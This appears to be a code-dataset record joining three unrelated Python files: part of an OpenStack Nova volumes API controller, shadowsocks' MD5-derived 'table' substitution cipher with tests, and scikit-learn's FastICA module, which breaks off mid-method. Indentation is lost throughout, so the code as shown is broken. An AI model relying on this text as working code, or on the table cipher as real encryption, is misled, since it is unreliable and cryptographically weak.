from nova.api.openstack import common
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import flags
from nova.openstack.common import log as logging
from nova import utils
from nova import volume
from nova.volume import volume_types
LOG = logging.getLogger(__name__)
FLAGS = flags.FLAGS
def _translate_attachment_detail_view(_context, vol):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(_context, vol)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(_context, vol):
"""Maps keys for attachment summary view."""
d = {}
volume_id = vol['id']
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volume_id'] = volume_id
d['server_id'] = vol['instance_uuid']
if vol.get('mountpoint'):
d['device'] = vol['mountpoint']
return d
def _translate_volume_detail_view(context, vol, image_id=None):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol, image_id)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol, image_id=None):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availability_zone'] = vol['availability_zone']
d['created_at'] = vol['created_at']
d['attachments'] = []
if vol['attach_status'] == 'attached':
attachment = _translate_attachment_detail_view(context, vol)
d['attachments'].append(attachment)
d['display_name'] = vol['display_name']
d['display_description'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volume_type'] = vol['volume_type']['name']
else:
# TODO(bcwaldon): remove str cast once we use uuids
d['volume_type'] = str(vol['volume_type_id'])
d['snapshot_id'] = vol['snapshot_id']
if image_id:
d['image_id'] = image_id
LOG.audit(_("vol=%s"), vol, context=context)
if vol.get('volume_metadata'):
metadata = vol.get('volume_metadata')
d['metadata'] = dict((item['key'], item['value']) for item in metadata)
else:
d['metadata'] = {}
return d
def make_attachment(elem):
elem.set('id')
elem.set('server_id')
elem.set('volume_id')
elem.set('device')
def make_volume(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('availability_zone')
elem.set('created_at')
elem.set('display_name')
elem.set('display_description')
elem.set('volume_type')
elem.set('snapshot_id')
attachments = xmlutil.SubTemplateElement(elem, 'attachments')
attachment = xmlutil.SubTemplateElement(attachments, 'attachment',
selector='attachments')
make_attachment(attachment)
# Attach metadata node
elem.append(common.MetadataTemplate())
class VolumeTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volume', selector='volume')
make_volume(root)
return xmlutil.MasterTemplate(root, 1)
class VolumesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumes')
elem = xmlutil.SubTemplateElement(root, 'volume', selector='volumes')
make_volume(elem)
return xmlutil.MasterTemplate(root, 1)
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_volume(self, node):
"""Marshal the volume attribute of a parsed request."""
volume = {}
volume_node = self.find_first_child_named(node, 'volume')
attributes = ['display_name', 'display_description', 'size',
'volume_type', 'availability_zone']
for attr in attributes:
if volume_node.getAttribute(attr):
volume[attr] = volume_node.getAttribute(attr)
metadata_node = self.find_first_child_named(volume_node, 'metadata')
if metadata_node is not None:
volume['metadata'] = self.extract_metadata(metadata_node)
return volume
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted create volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
def default(self, string):
"""Deserialize an xml-formatted volume create request."""
dom = minidom.parseString(string)
volume = self._extract_volume(dom)
return {'body': {'volume': volume}}
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self, ext_mgr):
self.volume_api = volume.API()
self.ext_mgr = ext_mgr
super(VolumeController, self).__init__()
@wsgi.serializers(xml=VolumeTemplate)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
try:
vol = self.volume_api.get(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return {'volume': _translate_volume_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
LOG.audit(_("Delete volume with id: %s"), id, context=context)
try:
volume = self.volume_api.get(context, id)
self.volume_api.delete(context, volume)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=VolumesTemplate)
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@wsgi.serializers(xml=VolumesTemplate)
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
search_opts = {}
search_opts.update(req.GET)
context = req.environ['nova.context']
remove_invalid_options(context,
search_opts, self._get_volume_search_options())
volumes = self.volume_api.get_all(context, search_opts=search_opts)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
def _image_uuid_from_href(self, image_href):
# If the image href was generated by nova api, strip image_href
# down to an id.
try:
image_uuid = image_href.split('/').pop()
except (TypeError, AttributeError):
msg = _("Invalid imageRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
if not utils.is_uuid_like(image_uuid):
msg = _("Invalid imageRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
return image_uuid
@wsgi.serializers(xml=VolumeTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new volume."""
if not self.is_valid_body(body, 'volume'):
raise exc.HTTPUnprocessableEntity()
context = req.environ['nova.context']
volume = body['volume']
kwargs = {}
req_volume_type = volume.get('volume_type', None)
if req_volume_type:
try:
kwargs['volume_type'] = volume_types.get_volume_type_by_name(
context, req_volume_type)
except exception.NotFound:
raise exc.HTTPNotFound()
kwargs['metadata'] = volume.get('metadata', None)
snapshot_id = volume.get('snapshot_id')
if snapshot_id is not None:
kwargs['snapshot'] = self.volume_api.get_snapshot(context,
snapshot_id)
else:
kwargs['snapshot'] = None
size = volume.get('size', None)
if size is None and kwargs['snapshot'] is not None:
size = kwargs['snapshot']['volume_size']
LOG.audit(_("Create volume of %s GB"), size, context=context)
image_href = None
image_uuid = None
if self.ext_mgr.is_loaded('os-image-create'):
image_href = volume.get('imageRef')
if snapshot_id and image_href:
msg = _("Snapshot and image cannot be specified together.")
raise exc.HTTPBadRequest(explanation=msg)
if image_href:
image_uuid = self._image_uuid_from_href(image_href)
kwargs['image_id'] = image_uuid
kwargs['availability_zone'] = volume.get('availability_zone', None)
new_volume = self.volume_api.create(context,
size,
volume.get('display_name'),
volume.get('display_description'),
**kwargs)
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume),
image_uuid)
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _get_volume_search_options(self):
"""Return volume search options allowed by non-admin."""
return ('name', 'status')
def create_resource(ext_mgr):
return wsgi.Resource(VolumeController(ext_mgr))
def remove_invalid_options(context, search_options, allowed_search_options):
"""Remove search options that are not valid for non-admin API/context."""
if context.is_admin:
# Allow all options
return
# Otherwise, strip out all unknown options
unknown_options = [opt for opt in search_options
if opt not in allowed_search_options]
bad_options = ", ".join(unknown_options)
log_msg = _("Removing options '%(bad_options)s' from query") % locals()
LOG.debug(log_msg)
for opt in unknown_options:
search_options.pop(opt, None)
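# For reference, a sketch of the request body create() above parses; the
# values are illustrative, and every key is read via volume.get(...) in the
# handler. imageRef is honored only when the os-image-create extension is
# loaded, and is mutually exclusive with snapshot_id:
#
#     {"volume": {"size": 10,
#                 "display_name": "my-volume",
#                 "display_description": "scratch space",
#                 "volume_type": null,
#                 "metadata": {"purpose": "testing"},
#                 "snapshot_id": null,
#                 "availability_zone": null}}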
|
Ivicel/shadowsocks
|
refs/heads/master
|
shadowsocks/crypto/table.py
|
1044
|
#!/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import string
import struct
import hashlib
__all__ = ['ciphers']
cached_tables = {}
if hasattr(string, 'maketrans'):
maketrans = string.maketrans
translate = string.translate
else:
maketrans = bytes.maketrans
translate = bytes.translate
def get_table(key):
m = hashlib.md5()
m.update(key)
s = m.digest()
a, b = struct.unpack('<QQ', s)
table = maketrans(b'', b'')
table = [table[i: i + 1] for i in range(len(table))]
for i in range(1, 1024):
table.sort(key=lambda x: int(a % (ord(x) + i)))
return table
def init_table(key):
if key not in cached_tables:
encrypt_table = b''.join(get_table(key))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
cached_tables[key] = [encrypt_table, decrypt_table]
return cached_tables[key]
class TableCipher(object):
def __init__(self, cipher_name, key, iv, op):
self._encrypt_table, self._decrypt_table = init_table(key)
self._op = op
def update(self, data):
if self._op:
return translate(data, self._encrypt_table)
else:
return translate(data, self._decrypt_table)
ciphers = {
'table': (0, 0, TableCipher)
}
def test_table_result():
from shadowsocks.common import ord
target1 = [
[60, 53, 84, 138, 217, 94, 88, 23, 39, 242, 219, 35, 12, 157, 165, 181,
255, 143, 83, 247, 162, 16, 31, 209, 190, 171, 115, 65, 38, 41, 21,
245, 236, 46, 121, 62, 166, 233, 44, 154, 153, 145, 230, 49, 128, 216,
173, 29, 241, 119, 64, 229, 194, 103, 131, 110, 26, 197, 218, 59, 204,
56, 27, 34, 141, 221, 149, 239, 192, 195, 24, 155, 170, 183, 11, 254,
213, 37, 137, 226, 75, 203, 55, 19, 72, 248, 22, 129, 33, 175, 178,
10, 198, 71, 77, 36, 113, 167, 48, 2, 117, 140, 142, 66, 199, 232,
243, 32, 123, 54, 51, 82, 57, 177, 87, 251, 150, 196, 133, 5, 253,
130, 8, 184, 14, 152, 231, 3, 186, 159, 76, 89, 228, 205, 156, 96,
163, 146, 18, 91, 132, 85, 80, 109, 172, 176, 105, 13, 50, 235, 127,
0, 189, 95, 98, 136, 250, 200, 108, 179, 211, 214, 106, 168, 78, 79,
74, 210, 30, 73, 201, 151, 208, 114, 101, 174, 92, 52, 120, 240, 15,
169, 220, 182, 81, 224, 43, 185, 40, 99, 180, 17, 212, 158, 42, 90, 9,
191, 45, 6, 25, 4, 222, 67, 126, 1, 116, 124, 206, 69, 61, 7, 68, 97,
202, 63, 244, 20, 28, 58, 93, 134, 104, 144, 227, 147, 102, 118, 135,
148, 47, 238, 86, 112, 122, 70, 107, 215, 100, 139, 223, 225, 164,
237, 111, 125, 207, 160, 187, 246, 234, 161, 188, 193, 249, 252],
[151, 205, 99, 127, 201, 119, 199, 211, 122, 196, 91, 74, 12, 147, 124,
180, 21, 191, 138, 83, 217, 30, 86, 7, 70, 200, 56, 62, 218, 47, 168,
22, 107, 88, 63, 11, 95, 77, 28, 8, 188, 29, 194, 186, 38, 198, 33,
230, 98, 43, 148, 110, 177, 1, 109, 82, 61, 112, 219, 59, 0, 210, 35,
215, 50, 27, 103, 203, 212, 209, 235, 93, 84, 169, 166, 80, 130, 94,
164, 165, 142, 184, 111, 18, 2, 141, 232, 114, 6, 131, 195, 139, 176,
220, 5, 153, 135, 213, 154, 189, 238, 174, 226, 53, 222, 146, 162,
236, 158, 143, 55, 244, 233, 96, 173, 26, 206, 100, 227, 49, 178, 34,
234, 108, 207, 245, 204, 150, 44, 87, 121, 54, 140, 118, 221, 228,
155, 78, 3, 239, 101, 64, 102, 17, 223, 41, 137, 225, 229, 66, 116,
171, 125, 40, 39, 71, 134, 13, 193, 129, 247, 251, 20, 136, 242, 14,
36, 97, 163, 181, 72, 25, 144, 46, 175, 89, 145, 113, 90, 159, 190,
15, 183, 73, 123, 187, 128, 248, 252, 152, 24, 197, 68, 253, 52, 69,
117, 57, 92, 104, 157, 170, 214, 81, 60, 133, 208, 246, 172, 23, 167,
160, 192, 76, 161, 237, 45, 4, 58, 10, 182, 65, 202, 240, 185, 241,
79, 224, 132, 51, 42, 126, 105, 37, 250, 149, 32, 243, 231, 67, 179,
48, 9, 106, 216, 31, 249, 19, 85, 254, 156, 115, 255, 120, 75, 16]]
target2 = [
[124, 30, 170, 247, 27, 127, 224, 59, 13, 22, 196, 76, 72, 154, 32,
209, 4, 2, 131, 62, 101, 51, 230, 9, 166, 11, 99, 80, 208, 112, 36,
248, 81, 102, 130, 88, 218, 38, 168, 15, 241, 228, 167, 117, 158, 41,
10, 180, 194, 50, 204, 243, 246, 251, 29, 198, 219, 210, 195, 21, 54,
91, 203, 221, 70, 57, 183, 17, 147, 49, 133, 65, 77, 55, 202, 122,
162, 169, 188, 200, 190, 125, 63, 244, 96, 31, 107, 106, 74, 143, 116,
148, 78, 46, 1, 137, 150, 110, 181, 56, 95, 139, 58, 3, 231, 66, 165,
142, 242, 43, 192, 157, 89, 175, 109, 220, 128, 0, 178, 42, 255, 20,
214, 185, 83, 160, 253, 7, 23, 92, 111, 153, 26, 226, 33, 176, 144,
18, 216, 212, 28, 151, 71, 206, 222, 182, 8, 174, 205, 201, 152, 240,
155, 108, 223, 104, 239, 98, 164, 211, 184, 34, 193, 14, 114, 187, 40,
254, 12, 67, 93, 217, 6, 94, 16, 19, 82, 86, 245, 24, 197, 134, 132,
138, 229, 121, 5, 235, 238, 85, 47, 103, 113, 179, 69, 250, 45, 135,
156, 25, 61, 75, 44, 146, 189, 84, 207, 172, 119, 53, 123, 186, 120,
171, 68, 227, 145, 136, 100, 90, 48, 79, 159, 149, 39, 213, 236, 126,
52, 60, 225, 199, 105, 73, 233, 252, 118, 215, 35, 115, 64, 37, 97,
129, 161, 177, 87, 237, 141, 173, 191, 163, 140, 234, 232, 249],
[117, 94, 17, 103, 16, 186, 172, 127, 146, 23, 46, 25, 168, 8, 163, 39,
174, 67, 137, 175, 121, 59, 9, 128, 179, 199, 132, 4, 140, 54, 1, 85,
14, 134, 161, 238, 30, 241, 37, 224, 166, 45, 119, 109, 202, 196, 93,
190, 220, 69, 49, 21, 228, 209, 60, 73, 99, 65, 102, 7, 229, 200, 19,
82, 240, 71, 105, 169, 214, 194, 64, 142, 12, 233, 88, 201, 11, 72,
92, 221, 27, 32, 176, 124, 205, 189, 177, 246, 35, 112, 219, 61, 129,
170, 173, 100, 84, 242, 157, 26, 218, 20, 33, 191, 155, 232, 87, 86,
153, 114, 97, 130, 29, 192, 164, 239, 90, 43, 236, 208, 212, 185, 75,
210, 0, 81, 227, 5, 116, 243, 34, 18, 182, 70, 181, 197, 217, 95, 183,
101, 252, 248, 107, 89, 136, 216, 203, 68, 91, 223, 96, 141, 150, 131,
13, 152, 198, 111, 44, 222, 125, 244, 76, 251, 158, 106, 24, 42, 38,
77, 2, 213, 207, 249, 147, 113, 135, 245, 118, 193, 47, 98, 145, 66,
160, 123, 211, 165, 78, 204, 80, 250, 110, 162, 48, 58, 10, 180, 55,
231, 79, 149, 74, 62, 50, 148, 143, 206, 28, 15, 57, 159, 139, 225,
122, 237, 138, 171, 36, 56, 115, 63, 144, 154, 6, 230, 133, 215, 41,
184, 22, 104, 254, 234, 253, 187, 226, 247, 188, 156, 151, 40, 108,
51, 83, 178, 52, 3, 31, 255, 195, 53, 235, 126, 167, 120]]
encrypt_table = b''.join(get_table(b'foobar!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target1[0][i] == ord(encrypt_table[i]))
assert (target1[1][i] == ord(decrypt_table[i]))
encrypt_table = b''.join(get_table(b'barfoo!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target2[0][i] == ord(encrypt_table[i]))
assert (target2[1][i] == ord(decrypt_table[i]))
def test_encryption():
from shadowsocks.crypto import util
cipher = TableCipher('table', b'test', b'', 1)
decipher = TableCipher('table', b'test', b'', 0)
util.run_cipher(cipher, decipher)
if __name__ == '__main__':
test_table_result()
test_encryption()
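# Round-trip usage sketch (key and plaintext are arbitrary):
#
#     cipher = TableCipher('table', b'secret-key', b'', 1)    # op=1: encrypt
#     decipher = TableCipher('table', b'secret-key', b'', 0)  # op=0: decrypt
#     assert decipher.update(cipher.update(b'hello world')) == b'hello world'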
|
marcocaccin/scikit-learn
|
refs/heads/master
|
sklearn/decomposition/fastica_.py
|
54
|
"""
Python implementation of the fast ICA algorithms.
Reference: Tables 8.3 and 8.4 page 196 in the book:
Independent Component Analysis, by Hyvarinen et al.
"""
# Authors: Pierre Lafaye de Micheaux, Stefan van der Walt, Gael Varoquaux,
# Bertrand Thirion, Alexandre Gramfort, Denis A. Engemann
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..externals import six
from ..externals.six import moves
from ..utils import check_array, as_float_array, check_random_state
from ..utils.extmath import fast_dot
from ..utils.validation import check_is_fitted
from ..utils.validation import FLOAT_DTYPES
__all__ = ['fastica', 'FastICA']
def _gs_decorrelation(w, W, j):
"""
Orthonormalize w wrt the first j rows of W
Parameters
----------
w : ndarray of shape(n)
Array to be orthogonalized
W : ndarray of shape(p, n)
Null space definition
j : int < p
Number of initial rows of the null space W with respect to which
w is orthogonalized.
Notes
-----
Assumes that W is orthogonal
w changed in place
"""
w -= np.dot(np.dot(w, W[:j].T), W[:j])
return w
def _sym_decorrelation(W):
""" Symmetric decorrelation
i.e. W <- (W * W.T) ^{-1/2} * W
"""
s, u = linalg.eigh(np.dot(W, W.T))
# u (resp. s) contains the eigenvectors (resp. square roots of
# the eigenvalues) of W * W.T
return np.dot(np.dot(u * (1. / np.sqrt(s)), u.T), W)
def _ica_def(X, tol, g, fun_args, max_iter, w_init):
"""Deflationary FastICA using fun approx to neg-entropy function
Used internally by FastICA.
"""
n_components = w_init.shape[0]
W = np.zeros((n_components, n_components), dtype=X.dtype)
n_iter = []
# j is the index of the extracted component
for j in range(n_components):
w = w_init[j, :].copy()
w /= np.sqrt((w ** 2).sum())
for i in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(w.T, X), fun_args)
w1 = (X * gwtx).mean(axis=1) - g_wtx.mean() * w
_gs_decorrelation(w1, W, j)
w1 /= np.sqrt((w1 ** 2).sum())
lim = np.abs(np.abs((w1 * w).sum()) - 1)
w = w1
if lim < tol:
break
n_iter.append(i + 1)
W[j, :] = w
return W, max(n_iter)
def _ica_par(X, tol, g, fun_args, max_iter, w_init):
"""Parallel FastICA.
Used internally by FastICA --main loop
"""
W = _sym_decorrelation(w_init)
del w_init
p_ = float(X.shape[1])
for ii in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(W, X), fun_args)
W1 = _sym_decorrelation(fast_dot(gwtx, X.T) / p_
- g_wtx[:, np.newaxis] * W)
del gwtx, g_wtx
# builtin max, abs are faster than numpy counterparts.
lim = max(abs(abs(np.diag(fast_dot(W1, W.T))) - 1))
W = W1
if lim < tol:
break
else:
warnings.warn('FastICA did not converge. Consider increasing '
'tolerance or the maximum number of iterations.')
return W, ii + 1
# Some standard non-linear functions.
# XXX: these should be optimized, as they can be a bottleneck.
def _logcosh(x, fun_args=None):
alpha = fun_args.get('alpha', 1.0) # comment it out?
x *= alpha
gx = np.tanh(x, x) # apply the tanh inplace
g_x = np.empty(x.shape[0])
# XXX compute in chunks to avoid extra allocation
for i, gx_i in enumerate(gx): # please don't vectorize.
g_x[i] = (alpha * (1 - gx_i ** 2)).mean()
return gx, g_x
def _exp(x, fun_args):
exp = np.exp(-(x ** 2) / 2)
gx = x * exp
g_x = (1 - x ** 2) * exp
return gx, g_x.mean(axis=-1)
def _cube(x, fun_args):
return x ** 3, (3 * x ** 2).mean(axis=-1)
def fastica(X, n_components=None, algorithm="parallel", whiten=True,
fun="logcosh", fun_args=None, max_iter=200, tol=1e-04, w_init=None,
random_state=None, return_X_mean=False, compute_sources=True,
return_n_iter=False):
"""Perform Fast Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
n_components : int, optional
Number of components to extract. If None no dimension reduction
is performed.
algorithm : {'parallel', 'deflation'}, optional
Apply a parallel or deflational FASTICA algorithm.
whiten : boolean, optional
If True perform an initial whitening of the data.
If False, the data is assumed to have already been
preprocessed: it should be centered, normed and white.
Otherwise you will get incorrect results.
In this case the parameter n_components will be ignored.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty or None and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter : int, optional
Maximum number of iterations to perform.
tol : float, optional
A positive scalar giving the tolerance at which the
un-mixing matrix is considered to have converged.
w_init : (n_components, n_components) array, optional
Initial un-mixing array of dimension (n.comp,n.comp).
If None (default) then an array of normal r.v.'s is used.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
return_X_mean : bool, optional
If True, X_mean is returned too.
compute_sources : bool, optional
If False, sources are not computed, but only the rotation matrix.
This can save memory when working with big data. Defaults to True.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
K : array, shape (n_components, n_features) | None.
If whiten is 'True', K is the pre-whitening matrix that projects data
onto the first n_components principal components. If whiten is 'False',
K is 'None'.
W : array, shape (n_components, n_components)
Estimated un-mixing matrix.
The mixing matrix can be obtained by::
w = np.dot(W, K.T)
A = w.T * (w * w.T).I
S : array, shape (n_samples, n_components) | None
Estimated source matrix
X_mean : array, shape (n_features, )
The mean over features. Returned only if return_X_mean is True.
n_iter : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Else
they are just the number of iterations taken to converge. This is
returned only when return_n_iter is set to `True`.
Notes
-----
The data matrix X is considered to be a linear combination of
non-Gaussian (independent) components i.e. X = AS where columns of S
contain the independent components and A is a linear mixing
matrix. In short ICA attempts to 'un-mix' the data by estimating an
un-mixing matrix W where ``S = W K X.``
This implementation was originally made for data of shape
[n_features, n_samples]. Now the input is transposed
before the algorithm is applied. This makes it slightly
faster for Fortran-ordered input.
Implemented using FastICA:
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
random_state = check_random_state(random_state)
fun_args = {} if fun_args is None else fun_args
# make interface compatible with other decompositions
# a copy is required only for non whitened data
X = check_array(X, copy=whiten, dtype=FLOAT_DTYPES).T
alpha = fun_args.get('alpha', 1.0)
if not 1 <= alpha <= 2:
raise ValueError('alpha must be in [1,2]')
if fun == 'logcosh':
g = _logcosh
elif fun == 'exp':
g = _exp
elif fun == 'cube':
g = _cube
elif callable(fun):
def g(x, fun_args):
return fun(x, **fun_args)
else:
exc = ValueError if isinstance(fun, six.string_types) else TypeError
raise exc("Unknown function %r;"
" should be one of 'logcosh', 'exp', 'cube' or callable"
% fun)
n, p = X.shape
if not whiten and n_components is not None:
n_components = None
warnings.warn('Ignoring n_components with whiten=False.')
if n_components is None:
n_components = min(n, p)
if (n_components > min(n, p)):
n_components = min(n, p)
print("n_components is too large: it will be set to %s" % n_components)
if whiten:
# Centering the columns (ie the variables)
X_mean = X.mean(axis=-1)
X -= X_mean[:, np.newaxis]
# Whitening and preprocessing by PCA
u, d, _ = linalg.svd(X, full_matrices=False)
del _
K = (u / d).T[:n_components] # see (6.33) p.140
del u, d
X1 = np.dot(K, X)
# see (13.6) p.267 Here X1 is white and data
# in X has been projected onto a subspace by PCA
X1 *= np.sqrt(p)
else:
# X must be casted to floats to avoid typing issues with numpy
# 2.0 and the line below
X1 = as_float_array(X, copy=False) # copy has been taken care of
if w_init is None:
w_init = np.asarray(random_state.normal(size=(n_components,
n_components)), dtype=X1.dtype)
else:
w_init = np.asarray(w_init)
if w_init.shape != (n_components, n_components):
raise ValueError('w_init has invalid shape -- should be %(shape)s'
% {'shape': (n_components, n_components)})
kwargs = {'tol': tol,
'g': g,
'fun_args': fun_args,
'max_iter': max_iter,
'w_init': w_init}
if algorithm == 'parallel':
W, n_iter = _ica_par(X1, **kwargs)
elif algorithm == 'deflation':
W, n_iter = _ica_def(X1, **kwargs)
else:
raise ValueError('Invalid algorithm: must be either `parallel` or'
' `deflation`.')
del X1
if whiten:
if compute_sources:
S = fast_dot(fast_dot(W, K), X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return K, W, S, X_mean, n_iter
else:
return K, W, S, X_mean
else:
if return_n_iter:
return K, W, S, n_iter
else:
return K, W, S
else:
if compute_sources:
S = fast_dot(W, X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return None, W, S, None, n_iter
else:
return None, W, S, None
else:
if return_n_iter:
return None, W, S, n_iter
else:
return None, W, S
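# Usage sketch on synthetic mixed signals (shapes and the mixing matrix are
# arbitrary; S estimates the sources up to sign, scale and permutation):
#
#     import numpy as np
#     rng = np.random.RandomState(0)
#     t = np.linspace(0, 8, 2000)
#     S_true = np.c_[np.sin(2 * t), np.sign(np.sin(3 * t))]
#     A = np.array([[1.0, 0.5], [0.5, 2.0]])   # mixing matrix
#     X = S_true.dot(A.T)                      # observations, (n_samples, 2)
#     K, W, S = fastica(X, n_components=2, random_state=rng)
#     print(S.shape)                           # -> (2000, 2)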
class FastICA(BaseEstimator, TransformerMixin):
"""FastICA: a fast algorithm for Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
n_components : int, optional
Number of components to use. If none is passed, all are used.
algorithm : {'parallel', 'deflation'}
Apply parallel or deflational algorithm for FastICA.
whiten : boolean, optional
If whiten is false, the data is already considered to be
whitened, and no whitening is performed.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}.
max_iter : int, optional
Maximum number of iterations during fit.
tol : float, optional
Tolerance on update at each iteration.
w_init : None or an (n_components, n_components) ndarray
The mixing matrix to be used to initialize the algorithm.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
components_ : 2D array, shape (n_components, n_features)
The unmixing matrix.
mixing_ : array, shape (n_features, n_components)
The mixing matrix.
n_iter_ : int
If the algorithm is "deflation", n_iter is the
        maximum number of iterations run across all components. Otherwise
        it is the number of iterations taken to converge.
Notes
-----
Implementation based on
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
def __init__(self, n_components=None, algorithm='parallel', whiten=True,
fun='logcosh', fun_args=None, max_iter=200, tol=1e-4,
w_init=None, random_state=None):
super(FastICA, self).__init__()
self.n_components = n_components
self.algorithm = algorithm
self.whiten = whiten
self.fun = fun
self.fun_args = fun_args
self.max_iter = max_iter
self.tol = tol
self.w_init = w_init
self.random_state = random_state
def _fit(self, X, compute_sources=False):
"""Fit the model
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
compute_sources : bool
            If False, sources are not computed, only the rotation matrix.
This can save memory when working with big data. Defaults to False.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
fun_args = {} if self.fun_args is None else self.fun_args
whitening, unmixing, sources, X_mean, self.n_iter_ = fastica(
X=X, n_components=self.n_components, algorithm=self.algorithm,
whiten=self.whiten, fun=self.fun, fun_args=fun_args,
max_iter=self.max_iter, tol=self.tol, w_init=self.w_init,
random_state=self.random_state, return_X_mean=True,
compute_sources=compute_sources, return_n_iter=True)
if self.whiten:
self.components_ = np.dot(unmixing, whitening)
self.mean_ = X_mean
self.whitening_ = whitening
else:
self.components_ = unmixing
self.mixing_ = linalg.pinv(self.components_)
if compute_sources:
self.__sources = sources
return sources
def fit_transform(self, X, y=None):
"""Fit the model and recover the sources from X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
return self._fit(X, compute_sources=True)
def fit(self, X, y=None):
"""Fit the model to X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self
"""
self._fit(X, compute_sources=False)
return self
def transform(self, X, y=None, copy=True):
"""Recover the sources from X (apply the unmixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data to transform, where n_samples is the number of samples
and n_features is the number of features.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'mixing_')
X = check_array(X, copy=copy, dtype=FLOAT_DTYPES)
if self.whiten:
X -= self.mean_
return fast_dot(X, self.components_.T)
def inverse_transform(self, X, copy=True):
"""Transform the sources back to the mixed data (apply mixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_components)
Sources, where n_samples is the number of samples
and n_components is the number of components.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_features)
"""
check_is_fitted(self, 'mixing_')
